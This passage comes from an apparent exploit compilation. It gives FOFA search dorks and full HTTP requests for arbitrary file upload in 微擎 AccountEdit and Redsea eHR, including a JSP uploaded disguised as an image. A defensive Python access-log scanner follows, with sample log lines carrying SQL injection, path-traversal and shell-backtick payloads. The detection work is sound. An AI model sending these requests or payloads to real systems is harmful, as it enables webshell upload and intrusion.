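        print(label, confirm_time_based(send, benign, sleeping, clock=clock))
```

The RANDOMBLOB payload of entry 186 is CPU-bound rather than a fixed sleep, so its delay depends on the target's hardware; pass the gap you actually measured as delay instead of the default 5 seconds.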
202. 微擎 AccountEdit arbitrary file upload
FOFA: body="/Widgets/WidgetCollection/"
The ASP.NET form posts back with the page's __VIEWSTATE and __EVENTVALIDATION values, so they have to be fetched first and then substituted into the upload request. The bttnUpload value is the button's label 上传图片 ("upload image") and is sent as-is.

Step 1. Fetch the form to obtain the current __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Step 2. Substitute those values for the __VIEWSTATE and __EVENTVALIDATION placeholders below:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then reachable at /_data/Uploads/1123.txt

203. 红海云 (Redsea) eHR PtFjk file upload
FOFA: body="RedseaPlatform"
Multipart upload of a JSP through the fj_file field; the Content-Type of the part is set to image/jpeg while the filename keeps the .jsp extension.

POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
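For the defensive use this list is meant for, the request targets above can be matched against web-server access logs. The Python below is an added example, not part of the original compilation: it parses common/combined log format lines, percent-decodes the request target (twice, to unwrap double encoding), and flags both the specific paths of entries 186 to 203 and the generic payload shapes they use. The SAMPLE_LOG lines are constructed for the demo, not real traffic. Access logs carry no POST body, so for entries whose payload travels in the body (186, 187, 191, 195, 196, 201) only the path can be matched here; a WAF or reverse-proxy log that records bodies is needed to see the payload itself.

```python
import re
import urllib.parse
from dataclasses import dataclass, field
from typing import List, Optional

# Request targets (path, or path plus the start of the query) copied from
# entries 186-203 above, lower-cased for matching.
TARGET_MARKERS = {
    "/admin/pr_monitor/getting_index_data.php": "186 DataCube3 SQLi",
    "/index.cfm/_api/json/v1/default/?method=processasyncobject": "187 Mura CMS SQLi",
    "/attachment?file=": "188 attachment file read",
    "/xds/deletestudy.php": "189 LANWON deleteStudy SQLi",
    "/index.php/admin/userinfo/poihuoqu": "190 poihuoqu file read",
    "/navigationajax": "191 ESAFENET NavigationAjax SQLi",
    "/joinfapp/email/uploademailattr": "192 UploadEmailAttr upload",
    "/master/ajaxactions/setsystemtimeaction.php": "193 setSystemTimeAction RCE",
    "/servlet/uploadattachmentservlet": "194 uploadAttachmentServlet upload",
    "/send_order.cgi": "195 send_order.cgi RCE",
    "/cas/userctl/resetpasswordbysuper": "196 resetPasswordBySuper",
    "/entsoft/quotegask_editaction.entweb": "197 Quotegask_editAction SQLi",
    "/aliyundrive-webdav/query": "198 aliyundrive-webdav RCE",
    "/assetsmanager/upload": "199 Cockpit upload",
    "/js/player/dmplayer/dmku/": "200 SeaCMS dmku SQLi",
    "/newsedit/newsplan/task/binary.do": "201 binary.do SQLi",
    "/user/accountedit.aspx": "202 AccountEdit upload",
    "/redseaplatform/ptfjk.mob": "203 PtFjk upload",
}

# Generic payload shapes that recur in the entries above; these fire on any
# target, so a hit without a TARGET_MARKERS match still deserves a look.
PAYLOAD_PATTERNS = [
    (re.compile(r"waitfor\s+delay", re.I), "MSSQL time-based"),
    (re.compile(r"sleep\s*\(", re.I), "MySQL time-based"),
    (re.compile(r"randomblob\s*\(", re.I), "SQLite heavy-query"),
    (re.compile(r"(^|[^a-z])union\s+(all\s+)?select", re.I), "UNION-based"),
    (re.compile(r"(^|[/\\])\.\.[/\\]"), "path traversal"),
    (re.compile(r"\bfile://", re.I), "file:// scheme"),
    (re.compile(r"/etc/passwd"), "sensitive file"),
    (re.compile(r"`[^`]+`"), "shell backtick"),
]

# Common/combined log format: client ident user [time] "method target proto" status size ...
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)


@dataclass
class Finding:
    line_no: int            # 1-based index into the scanned lines
    target: str             # request target after percent-decoding
    entry: Optional[str]    # matching TARGET_MARKERS label, if any
    indicators: List[str] = field(default_factory=list)


def decode_target(target: str) -> str:
    """Percent-decode up to twice so %2527-style double encoding is unwrapped."""
    for _ in range(2):
        decoded = urllib.parse.unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_log(lines: List[str]) -> List[Finding]:
    """Return one Finding per line whose target matches a known path or payload shape."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        m = LOG_LINE.match(line)
        if not m:
            continue
        decoded = decode_target(m.group("target"))
        lowered = decoded.lower()
        entry = next((label for marker, label in TARGET_MARKERS.items() if marker in lowered), None)
        indicators = [label for pattern, label in PAYLOAD_PATTERNS if pattern.search(decoded)]
        if entry or indicators:
            findings.append(Finding(line_no, decoded, entry, indicators))
    return findings


# Constructed sample lines (not real traffic): the targets of entries 189, 188,
# 191 and 198, one benign request, and one generic UNION probe on an unknown path.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jun/2024:10:00:01 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [05/Jun/2024:10:00:02 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1450',
    '10.0.0.9 - - [05/Jun/2024:10:00:03 +0800] "GET /index.html HTTP/1.1" 200 8192',
    '10.0.0.5 - - [05/Jun/2024:10:00:04 +0800] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 64',
    '10.0.0.5 - - [05/Jun/2024:10:00:05 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 10',
    '10.0.0.7 - - [05/Jun/2024:10:00:06 +0800] "GET /search?q=1%20UNION%20SELECT%201,2 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.entry or 'no known entry'} {f.indicators} <- {f.target}")
```

Feed it the raw access log (for example, `scan_log(open("access.log").read().splitlines())`); the status code is kept in the parsed line for a reason: a 200 on the 188 or 189 targets is more urgent than a 404, since it means the endpoint exists on that host.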
